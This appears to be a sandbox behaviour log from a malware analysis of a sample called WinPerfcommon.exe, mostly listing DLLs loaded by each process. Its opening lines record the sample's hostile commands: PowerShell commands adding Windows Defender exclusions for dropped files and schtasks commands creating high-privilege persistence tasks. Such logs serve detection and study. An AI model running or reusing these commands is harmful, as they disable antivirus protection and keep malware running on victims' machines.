Source: C:\Windows\System32\cmd.exe | Process created: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
Source: unknown | Process created: C:\Program Files\Adobe\StartMenuExperienceHost.exe "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline"
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 9 /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 13 /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA39D.tmp" "c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: mscoree.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: apphelp.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: kernel.appcore.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: version.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: uxtheme.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: windows.storage.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: wldp.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: profapi.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: cryptsp.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: rsaenh.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: cryptbase.dll
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Section loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
